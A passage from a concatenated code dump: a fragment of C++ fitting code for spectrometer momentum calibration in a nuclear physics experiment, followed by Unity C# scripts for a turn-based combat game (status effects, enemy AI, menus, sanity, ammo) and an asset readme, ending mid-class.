// delta_pk_3[0] = 3.158e-2*hang10 + 4.05819e-1;
delta_pk_3[0] = 0.2993; /// may 07, 2021************
}
pk_real_3[0] = momr_3[0] + delta_pk_3[0]/1000.0;
par_k_3[0] = pk_real_3[0];// when RHRS matrix tuned
// par_k_3[0] = p13_3[i];
par_k_3[1] = p14_3[i]; // jan 31
par_k_3[2] = p15_3[i];
halla_p_3 = p16_3[i];
MM_3 = CalcMM(halla_p_3, par_ep_3, par_k_3, m_Al); //need to adjust
MM_3 = MM_3 -25.3123;
residual_3 = MM_3-ref_mm_3;
if(foil_flag_3[i]==0)
{chi_33 = chi_33 +25*pow(residual_3,2.0);}
else if(foil_flag_3[i]== 1)
{chi_33 = chi_33 +25*pow(residual_3,2.0);}
else
{chi_33 = chi_33 +15*pow(residual_3,2.0);}
// chi_33 = chi_33 +9*pow(residual_3,2.0);/// colsed on May 24, 2021
}
// ((((((((((((((((((((((((4(((((((((((((((( _4 H/T data for Al Jan 07, 2020((((((((((((((((((((((((((((((
for(int i=0; i<ntune_event_4; i++){
residual_4 = 0.0;
ref_mm_4 = 0.0;
ref_mm_4 = Lambda_real_4[foil_flag_4[i]];
ref_mm_4 = ref_mm_4/1000.0;
XFP_4 = x_4[i];
XpFP_4 = xp_4[i];
YFP_4 = y_4[i];
YpFP_4 = yp_4[i];
z_av_4 = z_recon_4[i];
ph1_4 = phir_4[i]; // open when calibrate the Momentum
ph1_4 = - ph1_4;
ph2_4 = phil_4[i];
ph2_4 = - ph2_4;
XFP_4 =(XFP_4 -XFPm)/XFPr;
XpFP_4 =(XpFP_4-XpFPm)/XpFPr;
YFP_4 =(YFP_4 -YFPm)/YFPr;
YpFP_4 =(YpFP_4-YpFPm)/YpFPr;
z_av_sc_4 = (z_av_4 - Ztm)/Ztr;
// For the LHRS momentum tunning
moml_4[0] = calcf2t_mom(param, XFP_4, XpFP_4, YFP_4, YpFP_4, z_av_sc_4);
moml_4[0] = moml_4[0]*Momr+Momm;
moml_4[0] = moml_4[0]*2.217925/2.1; //for H/T and tritium only
double hang9;
if(z_av_4<8.0e-2){
hang9 = ph2_4 + hrs_ang;
hang9 = -hang9;
delta_pep_4[0] = -1.35758*sin(-4.59571* hang9) + 2.09093;
delta_pep_4[0] = delta_pep_4[0] + 0.0637;/// may 07, 2021************
}
else{
hang9 = ph2_4 + hrs_ang;
hang9 = -hang9;
// delta_pep_4[0] = 6.23409e-3*hang9 + 4.03363e-1;
delta_pep_4[0] = 0.3004;/// may 07, 2021************
}
pep_real_4[0] = moml_4[0] + delta_pep_4[0]/1000.0; //LHRS momentum at the reaction point in GeV
// par_ep_4[0] = pep_real_4[0];// Wwhen LHRS momentum tuned, uncomment this line
par_ep_4[0] = p10_4[i];
par_ep_4[1] = p11_4[i];
par_ep_4[2] = p12_4[i];
//// for the RHRS momentum tunning
momr_4[0] = calcf2t_mom(param, XFP_4, XpFP_4, YFP_4, YpFP_4, z_av_sc_4);
momr_4[0] = momr_4[0]*Momr+Momm;
double hang10;
if(z_av_4<8.0e-2){
hang10 = ph1_4 - hrs_ang;
delta_pk_4[0] =-1.31749*sin(-4.61513* hang10) + 2.03687;
delta_pk_4[0] = delta_pk_4[0] + 0.0627;/// may 07, 2021************
}
else{
hang10 = ph1_4 - hrs_ang;
// delta_pk_4[0] = 3.158e-2*hang10 + 4.05819e-1;
delta_pk_4[0] = 0.2962;/// may 07, 2021************
}
pk_real_4[0] = momr_4[0] + delta_pk_4[0]/1000.0;
par_k_4[0] = pk_real_4[0];// when RHRS matrix tuned un coment this line
// par_k_4[0] = p13_4[i];
par_k_4[1] = p14_4[i]; // jan 31
par_k_4[2] = p15_4[i];
halla_p_4 = p16_4[i];
MM_4 = CalcMM(halla_p_4, par_ep_4, par_k_4, m_Al); //need to adjust
MM_4 = MM_4 -25.3123;
residual_4 = MM_4-ref_mm_4;
if(foil_flag_4[i]==0)
{chi_44 = chi_44 +25*pow(residual_4,2.0);}
else if(foil_flag_4[i]==1)
{chi_44 = chi_44 +25*pow(residual_4,2.0);}
else
{chi_44 = chi_44 +15*pow(residual_4,2.0);}
// chi_44 = chi_44 +9*pow(residual_4,2.0);/// colsed on May 24, 2021
}
//))))))))))))))))))))))))))))))))))))))))))))) _4 Jan 07, 2020 ))))))))))))))))))))))))))))
//))))))))))))))))))))))))))))))))))))))))))))) Jan 12, 2020 ))))))))))))))))))))))))))))
chi2 = chi_12 +chi_22 + chi_33 + chi_44;
chi2 = sqrt(chi2)/(double)ntune_event/sigma;
fval = chi2;
}
| c29b044cbf20429ca60e53f4664bffc097a1d7c4 | [
"C++"
] | 1 | C++ | Bishnu04/E12-17-003-Matrices | 34a9f345310272828ea453a5bf48e79de173080a | 6b743ea6dc859a2ff6bff99979e18479d53368a4 |
refs/heads/master | <file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
using UnityEngine.UI;
public class PlayerStatusEffect : MonoBehaviour
{
[Header("Speed Boost")]
public float speedModifier;
[Header("Doom")]
public bool isDoom;
public int doom_Counter;
public int doom_maxCounter = 3;
[SerializeField] TextMeshProUGUI doomText;
[Header("Poison")]
public bool isPoison;
public int poison_DamagePerTick;
public int poison_Counter;
public float poison_Interval = 1f;
[SerializeField] TextMeshProUGUI poisonText;
[SerializeField] Image healthBar;
public static PlayerStatusEffect instance;
private void Awake()
{
instance = this;
}
private void Start()
{
CombatMenu.instance.onMenuActive.AddListener(CountdownDOOM);
}
public void ApplyStatusEffect()
{
switch (DamageCalculator.instance.combatOutcome)
{
case DamageCalculator.CombatOutcome.Missed:
break;
default:
if (EnemyController.instance.currentAction.POISON)
{
InflictPOISON();
}
if (EnemyController.instance.currentAction.POISON)
{
}
break;
}
}
//========= DOOM ===============================================================================================================================
public void InflictDOOM() // Called by Sanity
{
if (isDoom) { return; }
isDoom = true;
doom_Counter = doom_maxCounter;
doomText.transform.parent.gameObject.SetActive(true);
doomText.text = doom_Counter.ToString();
}
public void RemoveDOOM()
{
isDoom = false;
doomText.transform.parent.gameObject.SetActive(false);
}
public void CountdownDOOM()
{
if (!isDoom) { return; }
doom_Counter--;
doomText.text = doom_Counter.ToString();
if (doom_Counter == 0)
{
Debug.Log("GAME OVER!");
}
}
//========= POISON =============================================================================================================================
public void InflictPOISON()
{
poison_Counter += EnemyController.instance.currentAction.POISON_Counter;
poisonText.text = poison_Counter.ToString();
poison_DamagePerTick = EnemyController.instance.currentAction.POISON_damagePerTick;
poisonText.transform.parent.gameObject.SetActive(true);
StartCoroutine(PoisonDamageOverTime());
}
private IEnumerator PoisonDamageOverTime()
{
if (isPoison) { yield break; }
float timer = 0;
poison_Interval = 1f;
isPoison = true;
Color healthColor;
healthColor = healthBar.color;
healthBar.color = new Color32(0, 120, 0, 255);
while(true)
{
yield return StartCoroutine(BattleCountdown(0.2f));
DamageCalculator.instance.PlayerTakeDamage(poison_DamagePerTick);
timer += 0.2f;
if (timer >= poison_Interval)
{
timer = 0f;
poison_Counter--;
poisonText.text = poison_Counter.ToString();
if (poison_Counter == 0)
{
poisonText.transform.parent.gameObject.SetActive(false);
isPoison = false;
healthBar.color = healthColor;
yield break;
}
}
}
//while(true)
//{
// if (CombatMenu.instance.isMenuActive || CombatManager.instance.pauseSlider || RallyRing.instance.isRallyActive)
// {
// yield return null;
// }
// else
// {
// DamageCalculator.instance.PlayerTakeDamage(poison_DamagePerTick);
//
// timer += 0.1f;
// if (timer >= poison_Interval)
// {
// timer = 0f;
// poison_Counter--;
// poisonText.text = poison_Counter.ToString();
//
// if (poison_Counter == 0)
// {
// poisonText.transform.parent.gameObject.SetActive(false);
// isPoison = false;
// yield break;
// }
// }
// }
// yield return new WaitForSeconds(0.1f);
//}
}
//=========== HELPER =============================================================================================================================
public static IEnumerator BattleCountdown(float duration)
{
float timer = 0;
while (true)
{
if (CombatMenu.instance.isMenuActive || CombatManager.instance.pauseSlider || RallyRing.instance.isRallyActive)
{
yield return null;
}
else
{
timer += Time.deltaTime;
if (timer >= duration)
{
yield break;
}
}
yield return null;
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
public class Pistol : MonoBehaviour
{
public int ammoCount;
public int maxAmmoCount;
public List<Image> bulletImages;
[SerializeField] Transform bullets;
[SerializeField] GameObject bulletPrefab;
[SerializeField] CombatButton combatButton;
private void Start()
{
ammoCount = maxAmmoCount;
for (int i = 0; i < maxAmmoCount; i++)
{
GameObject newBullet = Instantiate(bulletPrefab, Vector3.zero, Quaternion.identity, bullets);
bulletImages.Add(newBullet.GetComponent<Image>());
}
//PlayerController.instance.onActionReady.AddListener(ConsumeAmmo);
Aiming.instance.onAimingFinished.AddListener(ConsumeAmmo);
}
public void ConsumeAmmo()
{
if (!PlayerController.instance.currentAction.useAmmo) { return; }
if (ammoCount == 0) { return; }
ammoCount = Mathf.Clamp(ammoCount - 1, 0, maxAmmoCount);
int ammoIndex = ammoCount;
bulletImages[ammoIndex].color = new Color32(100, 100, 100, 255);
if (ammoCount == 0)
{
DisableActionButton();
}
}
public void DisableActionButton()
{
combatButton.DisableButton();
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.UI;
using TMPro;
using UnityEngine.Events;
public class EnemyController : MonoBehaviour
{
public Slider combatSlider;
[SerializeField] float sliderInterval;
[SerializeField] float speed;
[SerializeField] TextMeshProUGUI counterText;
[SerializeField] GameObject sliderHandle;
[SerializeField] GameObject intent;
[SerializeField] TextMeshProUGUI intentText;
private float speedRoll;
public int effectiveDamage;
public List<EnemyAction> baseActionList;
public List<EnemyAction> availableActionList;
public EnemyAction currentAction;
public UnityEvent onActionChosen;
public UnityEvent onActionReady;
public static EnemyController instance;
private void Awake()
{
instance = this;
}
// Start is called before the first frame update
private IEnumerator Start()
{
sliderHandle.SetActive(false);
intent.SetActive(false);
for (int i = 0; i < baseActionList.Count; i++)
{
availableActionList.Add(baseActionList[i]);
}
yield return new WaitForSeconds(1f);
ChooseCombatAction();
}
private IEnumerator ActivateCombatSlider(EnemyAction enemyAction)
{
combatSlider.value = speedRoll;
counterText.text = Mathf.FloorToInt(combatSlider.value).ToString();
while (combatSlider.value >= 0)
{
if (CombatMenu.instance.isMenuActive) { yield return null; }
else if (EnemyStatusEffect.instance.isStun)
{
// combatSlider.value = 0; // Called this in CombatHUD to prevent repeated "Interrupted"
sliderHandle.SetActive(false);
intent.SetActive(false);
yield return new WaitUntil(() => EnemyStatusEffect.instance.isStun == false);
ChooseCombatAction();
yield break;
}
else if (CombatManager.instance.pauseSlider || RallyRing.instance.isRallyActive)
{
yield return null;
}
else
{
combatSlider.value = Mathf.Clamp(combatSlider.value - speed, 0, 100);
counterText.text = Mathf.FloorToInt(combatSlider.value).ToString();
if (combatSlider.value == 0)
{
onActionReady.Invoke();
sliderHandle.SetActive(false);
intent.SetActive(false);
CombatManager.instance.EnemyTriggerPrecombat(enemyAction);
DamageCalculator.instance.DeterminePlayerFate(effectiveDamage, enemyAction);
yield return new WaitUntil(() => CombatManager.instance.pauseSlider == false);
ChooseCombatAction();
yield break;
}
yield return new WaitForSeconds(sliderInterval);
}
}
}
public void ChooseCombatAction()
{
int randomAction = Random.Range(0, availableActionList.Count);
// Start action cooldown (if applicable)
currentAction = availableActionList[randomAction];
if (currentAction.cooldown > 0)
{
StartCoroutine(TriggerActionCooldown(currentAction.cooldown));
}
// Speed Roll
speedRoll = Random.Range(currentAction.minSpeed, currentAction.maxSpeed);
// Damage Calculation
float factor_a = (currentAction.maxDamage - currentAction.minDamage) / (currentAction.maxSpeed - currentAction.minSpeed);
float factor_b = currentAction.maxDamage - factor_a * currentAction.maxSpeed;
effectiveDamage = Mathf.RoundToInt(factor_a * speedRoll + factor_b);
StartCoroutine(ActivateCombatSlider(currentAction));
sliderHandle.SetActive(true);
// Display Intent
intent.SetActive(true);
intentText.text = effectiveDamage.ToString();
// Invoke Event
onActionChosen.Invoke();
}
private IEnumerator TriggerActionCooldown(float cooldownDuration)
{
EnemyAction myAction = currentAction;
availableActionList.Remove(myAction);
yield return StartCoroutine(BattleCountdown(cooldownDuration));
availableActionList.Add(myAction);
}
/// =========== HELPER ======================================================================================
public static IEnumerator BattleCountdown(float duration)
{
float timer = 0;
while (true)
{
if (CombatMenu.instance.isMenuActive || CombatManager.instance.pauseSlider || RallyRing.instance.isRallyActive)
{
yield return null;
}
else
{
timer += Time.deltaTime;
if (timer >= duration)
{
yield break;
}
}
yield return null;
}
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEngine.Events;
using UnityEngine.EventSystems;
using TMPro;
using UnityEngine.UI;
using DG.Tweening;
//using DarkTonic.MasterAudio;
public class CombatButton : MonoBehaviour, IPointerDownHandler, ISelectHandler, IDeselectHandler
{
public enum ActionType
{
Root,
Attack,
Defend,
Stance,
Wait
}
public ActionType actionType;
public bool isDisabled;
[SerializeField] Animator animator;
[SerializeField] PlayerAction playerAction;
[SerializeField] TextMeshProUGUI buttonText;
public UnityEvent OnButtonClick;
public UnityEvent OnButtonSelect;
//[Header("SFX")]
//[SoundGroupAttribute] [SerializeField] string hoverSound = "Click";
//[SerializeField] string hoverVariation = "Click 4";
//[SoundGroupAttribute] [SerializeField] string clickSound = "Select";
//[SerializeField] string clickVariation = "Select 4";
void Start()
{
if (playerAction == null) { return; }
if(!string.IsNullOrEmpty(playerAction.actionName))
{
buttonText.text = playerAction.actionName;
}
}
// ======================= ADDED TO COMBAT MENU ====================================================================
private void OnEnable()
{
if (isDisabled)
{
animator.SetBool("Disabled", true);
GetComponent<Selectable>().enabled = false;
return;
}
else
{
StartCoroutine(AddToCombatMenuList());
}
}
private IEnumerator AddToCombatMenuList()
{
yield return new WaitForSeconds(0.1f); // Wait 0.1f for CombatMenu instance = this
CombatMenu.instance.allButtons.Add(this);
if (this.transform.parent.GetChild(0).gameObject == this.gameObject)
{
SelectThisButton();
}
}
// ======================= ON SELECT ====================================================================
public void SelectThisButton()
{
if (isDisabled) { return; }
EventSystem.current.SetSelectedGameObject(this.gameObject);
}
public void OnDeselect(BaseEventData data)
{
animator.SetBool("Selected", false);
}
public void OnSelect(BaseEventData eventData)
{
if (isDisabled) { return; }
if (!CombatMenu.instance.isMenuActive) { return; }
CombatMenu.instance.actionIndex = CombatMenu.instance.allButtons.IndexOf(this);
animator.SetBool("Selected", true);
if (playerAction == null)
{
CombatHUD.instance.HidePreviewSlider();
Sanity.instance.DisplaySanityText();
CombatMenu.instance.HideInfoBox();
return;
}
PlayerController.instance.SetCurrentAction(playerAction);
if (playerAction.baseSpeed == 0)
{
CombatHUD.instance.HidePreviewSlider();
}
else if (playerAction.baseSpeed > 0)
{
PlayerController.instance.CalculateEffectiveSpeed();
CombatHUD.instance.ShowPreviewSlider();
}
if (playerAction.sanityCost > 0 || playerAction.sanityGain > 0)
{
Sanity.instance.DisplaySanityPreview(playerAction.sanityCost, playerAction.sanityGain);
}
else if (playerAction.sanityCost == 0)
{
Sanity.instance.DisplaySanityText();
}
CombatMenu.instance.DisplayInfoBox(playerAction.description);
}
// ======================= ON CONFIRM ====================================================================
public void OnPointerDown(PointerEventData eventData)
{
if (isDisabled) { return; }
ConfirmSelectedAction();
}
public void ConfirmSelectedAction()
{
StartCoroutine(ConfirmSelectedActionCo());
}
private IEnumerator ConfirmSelectedActionCo()
{
animator.SetTrigger("Pressed");
yield return new WaitForSeconds(0.2f); // Wait for Button Shine
switch (actionType)
{
case ActionType.Root:
OnButtonClick.Invoke();
break;
default:
PlayerController.instance.ChooseCombatAction(playerAction);
break;
}
}
// ======================= DISABLED ====================================================================
public void DisableButton()
{
isDisabled = true;
}
/// AUDIO //////////////////////////////////////////////////////
//private void PlayHoverSound()
//{
// MasterAudio.PlaySoundAndForget("Click", 1f, 3f, 0f, "Click 4");
//}
//
//private void PlayClickSound()
//{
// MasterAudio.PlaySoundAndForget("Click", 1f, 1f, 0f, "Click 1");
//}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
using DG.Tweening;
using UnityEngine.Events;
public class CombatSprites : MonoBehaviour
{
[SerializeField] GameObject combatCanvas;
[SerializeField] GameObject[] combatSequence;
public bool pauseSlider;
public UnityEvent onCombatStarted;
public UnityEvent onCombatFinished;
public static CombatSprites instance;
private void Awake()
{
instance = this;
}
// Start is called before the first frame update
void Start()
{
CombatManager.instance.onPrecombatStart.AddListener(PauseCombatSlider);
CombatMenu.instance.onMenuActive.AddListener(PauseCombatSlider);
}
public void PauseCombatSlider()
{
pauseSlider = true;
}
public void ResumeCombatSlider()
{
pauseSlider = false;
}
public void StartCombatSequence()
{
combatSequence[CombatManager.instance.currentSequence].SetActive(true);
onCombatStarted.Invoke();
}
public void EndCombatSequence() // Called by Individual CombatSequence
{
ResumeCombatSlider();
foreach (GameObject sequence in combatSequence)
{
sequence.SetActive(false);
}
onCombatFinished.Invoke();
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DG.Tweening;
using UnityEngine.UI;
using TMPro;
using UnityEngine.Events;
using UnityEngine.EventSystems;
public class CombatMenu : MonoBehaviour
{
public enum MenuState
{
ROOT,
ATTACK,
DEFEND,
WAIT
}
public MenuState menuState;
public bool isMenuActive;
public bool actionQueued;
public List<CombatButton> allButtons;
public int actionIndex;
[SerializeField] SpriteRenderer playerSprite;
private Material playerMat;
[Header("Action Groups")]
[SerializeField] GameObject rootActionGroup;
[SerializeField] RectTransform attackActions;
[SerializeField] RectTransform defendActions;
[SerializeField] RectTransform waitActions;
[SerializeField] TextMeshProUGUI headerText;
[Header("Other GUI Elements")]
[SerializeField] GameObject auraVFX;
[SerializeField] GameObject tentacles;
[Header("Description Box")]
[SerializeField] GameObject infoBox;
[SerializeField] TextMeshProUGUI descriptionText;
public UnityEvent onMenuActive;
public static CombatMenu instance;
private void Awake()
{
instance = this;
playerMat = playerSprite.material;
}
private void OnEnable()
{
if (!actionQueued)
{
//DisplayRootActions();
RevealRootActions();
}
}
private void Update()
{
if (actionQueued) { return; }
if (!isMenuActive) { return; }
if(Input.GetKeyDown(KeyCode.Space))
{
ConfirmCurrentAction();
}
else if (Input.GetKeyDown(KeyCode.A))
{
RevealATTACK();
}
else if (Input.GetKeyDown(KeyCode.B))
{
RevealDEFEND();
}
else if (Input.GetKeyDown(KeyCode.X))
{
RevealWAIT();
}
}
public void ConfirmCurrentAction()
{
if (allButtons[actionIndex] == null) { return; }
allButtons[actionIndex].ConfirmSelectedAction();
if (allButtons[actionIndex].actionType != CombatButton.ActionType.Root)
{
HideAllMenu();
}
}
public void HideAllMenu()
{
StartCoroutine(HideAllMenuCo());
}
private IEnumerator HideAllMenuCo()
{
yield return new WaitForSeconds(0.2f); // Wait for Button Animation
isMenuActive = false;
allButtons.Clear();
headerText.text = null;
headerText.transform.parent.gameObject.SetActive(false);
//rootActions.DOLocalMoveX(-400f, 0.2f);
attackActions.DOLocalMoveX(-400f, 0.2f);
defendActions.DOLocalMoveX(-400f, 0.2f);
waitActions.DOLocalMoveX(-400f, 0.2f);
playerMat.SetFloat("_OutlineAlpha", 0f);
auraVFX.SetActive(false);
HideInfoBox();
}
public void RevealRootActions()
{
if (!isMenuActive)
{
onMenuActive.Invoke();
}
menuState = MenuState.ROOT;
attackActions.gameObject.SetActive(false);
defendActions.gameObject.SetActive(false);
waitActions.gameObject.SetActive(false);
tentacles.SetActive(true);
rootActionGroup.SetActive(true);
playerMat.SetFloat("_OutlineAlpha", 0.8f);
auraVFX.SetActive(true);
isMenuActive = true;
headerText.text = null;
headerText.transform.parent.gameObject.SetActive(false);
HideInfoBox();
}
public void HideRootActions()
{
tentacles.SetActive(false);
rootActionGroup.SetActive(false);
playerMat.SetFloat("_OutlineAlpha", 0f);
}
public void RevealATTACK()
{
if (menuState == MenuState.ATTACK) { return; }
menuState = MenuState.ATTACK;
rootActionGroup.gameObject.SetActive(false);
tentacles.SetActive(false);
allButtons.Clear();
attackActions.gameObject.SetActive(true);
headerText.transform.parent.gameObject.SetActive(true);
headerText.text = "ATTACK";
attackActions.DOLocalMoveX(0f, 0.2f);
}
public void RevealDEFEND()
{
if (menuState == MenuState.DEFEND) { return; }
menuState = MenuState.DEFEND;
rootActionGroup.gameObject.SetActive(false);
tentacles.SetActive(false);
allButtons.Clear();
defendActions.gameObject.SetActive(true);
headerText.transform.parent.gameObject.SetActive(true);
headerText.text = "DEFEND";
defendActions.DOLocalMoveX(0f, 0.2f);
}
public void RevealWAIT()
{
if (menuState == MenuState.WAIT) { return; }
menuState = MenuState.WAIT;
rootActionGroup.gameObject.SetActive(false);
tentacles.SetActive(false);
allButtons.Clear();
waitActions.gameObject.SetActive(true);
headerText.transform.parent.gameObject.SetActive(true);
headerText.text = "REGAIN";
waitActions.DOLocalMoveX(0f, 0.2f);
}
public void DisplayInfoBox(string description)
{
infoBox.SetActive(true);
descriptionText.text = description;
}
public void HideInfoBox()
{
infoBox.SetActive(false);
descriptionText.text = null;
}
private void OnDisable()
{
EventSystem.current.SetSelectedGameObject(null);
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DG.Tweening;
public class CombatSequence : MonoBehaviour
{
[SerializeField] SpriteRenderer playerSprite;
[SerializeField] SpriteRenderer enemySprite;
[SerializeField] GameObject bloodSprite;
private Material playerMat;
private Material enemyMat;
private void Awake()
{
playerMat = playerSprite.material;
enemyMat = enemySprite.material;
}
private void ShowEnemyDamage()
{
CombatHUD.instance.DisplayEnemyDamage();
}
private void ShowPlayerDamage()
{
CombatHUD.instance.DisplayPlayerDamage();
}
private void EnemySpriteEffect()
{
switch (DamageCalculator.instance.combatOutcome)
{
case DamageCalculator.CombatOutcome.Missed:
bloodSprite.SetActive(false);
break;
case DamageCalculator.CombatOutcome.Grazed:
break;
case DamageCalculator.CombatOutcome.Hit:
EnemyFlashHit();
bloodSprite.SetActive(true);
break;
}
}
private void PlayerSpriteEffect()
{
switch (DamageCalculator.instance.combatOutcome)
{
case DamageCalculator.CombatOutcome.Missed:
bloodSprite.SetActive(false);
break;
case DamageCalculator.CombatOutcome.Grazed:
break;
case DamageCalculator.CombatOutcome.Hit:
PlayerFlashHit();
bloodSprite.SetActive(true);
break;
}
}
public void PlayerFlashHit()
{
Sequence mySequence = DOTween.Sequence();
mySequence.Append(playerMat.DOFloat(0.4f, "_HitEffectBlend", 0.1f));
mySequence.Append(playerMat.DOFloat(0f, "_HitEffectBlend", 0.7f));
}
public void EnemyFlashHit()
{
Sequence mySequence = DOTween.Sequence();
mySequence.Append(enemyMat.DOFloat(0.4f, "_HitEffectBlend", 0.1f));
mySequence.Append(enemyMat.DOFloat(0f, "_HitEffectBlend", 0.7f));
}
private void FinishCombatAnimation()
{
CombatManager.instance.EndCombatSequence();
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DG.Tweening;
using UnityEngine.UI;
public class Quickstep : MonoBehaviour
{
[SerializeField] GameObject arrowPrefab;
[SerializeField] int arrowCount;
[SerializeField] Color color1;
[SerializeField] Color color2;
[SerializeField] Material arrowMat;
public List<Image> arrows;
public List<string> directions;
private bool isQuickstepping;
private int arrowIndex;
public static Quickstep instance;
private void Awake()
{
instance = this;
}
private void Start()
{
CombatManager.instance.onPrecombatStart.AddListener(EndQuickstep);
}
private void Update()
{
if (!isQuickstepping) { return; }
if (Input.GetKeyDown(KeyCode.LeftArrow) || Input.GetKeyDown(KeyCode.DownArrow) || Input.GetKeyDown(KeyCode.RightArrow) || Input.GetKeyDown(KeyCode.UpArrow))
{
CheckArrow();
}
}
private void CheckArrow()
{
if (arrowIndex >= arrows.Count) { return; }
switch (directions[arrowIndex])
{
case "RIGHT":
if (Input.GetKeyDown(KeyCode.RightArrow)) { CorrectArrow(); }
else { IncorrectArrow(); }
break;
case "UP":
if (Input.GetKeyDown(KeyCode.UpArrow)) { CorrectArrow(); }
else { IncorrectArrow(); }
break;
case "LEFT":
if (Input.GetKeyDown(KeyCode.LeftArrow)) { CorrectArrow(); }
else { IncorrectArrow(); }
break;
case "DOWN":
if (Input.GetKeyDown(KeyCode.DownArrow)) { CorrectArrow(); }
else { IncorrectArrow(); }
break;
default:
Debug.Log("Incorrect string");
break;
}
}
private void CorrectArrow()
{
if(!arrows[arrowIndex].gameObject.activeSelf)
{
arrows[arrowIndex].gameObject.SetActive(true);
arrows[arrowIndex].transform.parent.GetChild(1).gameObject.SetActive(false);
}
arrows[arrowIndex].transform.DOScale(1.2f, 0.2f);
arrows[arrowIndex].color = color1;
arrowIndex++;
if (arrowIndex == arrows.Count)
{
Debug.Log("Successful Quickstep!");
arrowMat.DOFloat(1, "_FadeAmount", 0.5f);
PlayerController.instance.defendState = PlayerController.DefendState.Quickstepping;
}
}
private void IncorrectArrow()
{
for (int i = 0; i < arrows.Count; i++)
{
arrows[i].transform.DOScale(1f, 0.2f);
arrows[i].color = color2;
}
arrowIndex = 0;
}
public void SpawnArrows()
{
isQuickstepping = true;
arrowMat.SetFloat("_FadeAmount", -0.1f);
for (int i = 0; i < arrowCount; i++)
{
int direction = Random.Range(0, 4);
switch (direction)
{
case 0:
GameObject arrow_RIGHT = Instantiate(arrowPrefab, Vector3.zero, Quaternion.identity, this.transform);
Image arrow_R = arrow_RIGHT.GetComponentInChildren<Image>();
arrow_R.transform.localRotation = Quaternion.Euler(0.0f, 0.0f, 0.0f);
arrows.Add(arrow_R);
directions.Add("RIGHT");
break;
case 1:
GameObject arrow_UP = Instantiate(arrowPrefab, Vector3.zero, Quaternion.identity, this.transform);
Image arrow_U = arrow_UP.GetComponentInChildren<Image>();
arrow_U.transform.localRotation = Quaternion.Euler(0.0f, 0.0f, 90.0f);
arrows.Add(arrow_U);
directions.Add("UP");
break;
case 2:
GameObject arrow_LEFT = Instantiate(arrowPrefab, Vector3.zero, Quaternion.identity, this.transform);
Image arrow_L = arrow_LEFT.GetComponentInChildren<Image>();
arrow_L.transform.localRotation = Quaternion.Euler(0.0f, 0.0f, 180.0f);
arrows.Add(arrow_L);
directions.Add("LEFT");
break;
case 3:
GameObject arrow_DOWN = Instantiate(arrowPrefab, Vector3.zero, Quaternion.identity, this.transform);
Image arrow_D = arrow_DOWN.GetComponentInChildren<Image>();
arrow_D.transform.localRotation = Quaternion.Euler(0.0f, 0.0f, 270.0f);
arrows.Add(arrow_D);
directions.Add("DOWN");
break;
default:
Debug.Log("Incorrect Direction Index");
break;
}
}
RandomizeArrowGuess();
}
private void RandomizeArrowGuess()
{
int randomGuess = Random.Range(1, arrows.Count);
arrows[randomGuess].transform.parent.GetChild(1).gameObject.SetActive(true);
arrows[randomGuess].gameObject.SetActive(false);
}
private void EndQuickstep()
{
isQuickstepping = false;
for (int i = 0; i < arrows.Count; i++)
{
Destroy(arrows[i].transform.parent.gameObject);
}
arrows.Clear();
directions.Clear();
arrowIndex = 0;
CombatHUD.instance.HidePlayerQueueText();
}
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using TMPro;
public class Sanity : MonoBehaviour
{
[SerializeField] TextMeshProUGUI sanityText;
public int sanityCounter;
[SerializeField] Color color1;
[SerializeField] Color color2;
[SerializeField] int doomThreshold = 100;
public static Sanity instance;
private void Awake()
{
instance = this;
}
void Start()
{
DisplaySanityText();
PlayerController.instance.onActionChosen.AddListener(IncreaseSanity);
CombatMenu.instance.onMenuActive.AddListener(CheckDOOM);
}
public void DisplaySanityPreview(int cost, int gain) // Called by Combat Button
{
int previewCounter = Mathf.Clamp(sanityCounter + cost - gain, 0, 999);
sanityText.text = previewCounter.ToString();
sanityText.color = color2;
}
public void IncreaseSanity()
{
sanityCounter += PlayerController.instance.currentAction.sanityCost;
DisplaySanityText();
}
private void CheckDOOM()
{
if (sanityCounter >= doomThreshold)
{
PlayerStatusEffect.instance.InflictDOOM();
}
else
{
PlayerStatusEffect.instance.RemoveDOOM();
}
}
public void RegainSanity()
{
sanityCounter = Mathf.Clamp(sanityCounter - PlayerController.instance.currentAction.sanityGain, 0, 999);
DisplaySanityText();
}
public void DisplaySanityText()
{
sanityText.text = sanityCounter.ToString();
sanityText.color = color1;
}
}
<file_sep>Thank you for purchasing the Haunted Town.
Please use the following project settings.
Edit->Project Settings->Player->Other Settings/Rendering
Set the Color Space to "Linear"
Edit->Project Settings->Graphics->Tier Settings
Set the Rendering Path to "Deferred"
If the Postprocessing Stack is not setup yet install the Post Processing stack via the the Windows->Packet Manager.
Follow the Unity docs to set up the Postprocessing stack: https://unity3d.com/how-to/set-up-post-processing-stack
You find the according profiles under scenes/scene*Profiles
Regards
TripleBrick
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
[CreateAssetMenu(menuName = "Player Action")]
public class PlayerAction : ScriptableObject
{
public enum ActionType
{
Attack,
Dodge,
Block,
Quickstep,
ShortWait,
LongWait
}
public ActionType actionType;
[Header("General")]
public string actionName;
[TextArea(5, 5)] public string description;
public int baseSpeed;
public int sanityCost;
public int sequenceID;
public bool useAmmo;
[Header("Attack")]
public int baseDamage;
public float baseHitChance;
[Header("Wait")]
public int sanityGain;
[Header("Stun")]
public bool STUN;
public int STUN_Counter;
}
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using DG.Tweening;
using UnityEngine.UI;
using TMPro;
public class RallyRing : MonoBehaviour
{
[SerializeField] Slider playerSlider;
[SerializeField] float minRallyDuration;
[SerializeField] float maxRallyDuration;
[SerializeField] float boostDuration;
[SerializeField] float boostAmount;
[SerializeField] float boostPct = 0.2f;
public bool isBoosted;
public float timer;
[SerializeField] float maxTimer;
[SerializeField] float minTimer;
[SerializeField] RectTransform ring;
[SerializeField] Image tokenImage;
private Color originalColor;
public bool isRallyActive;
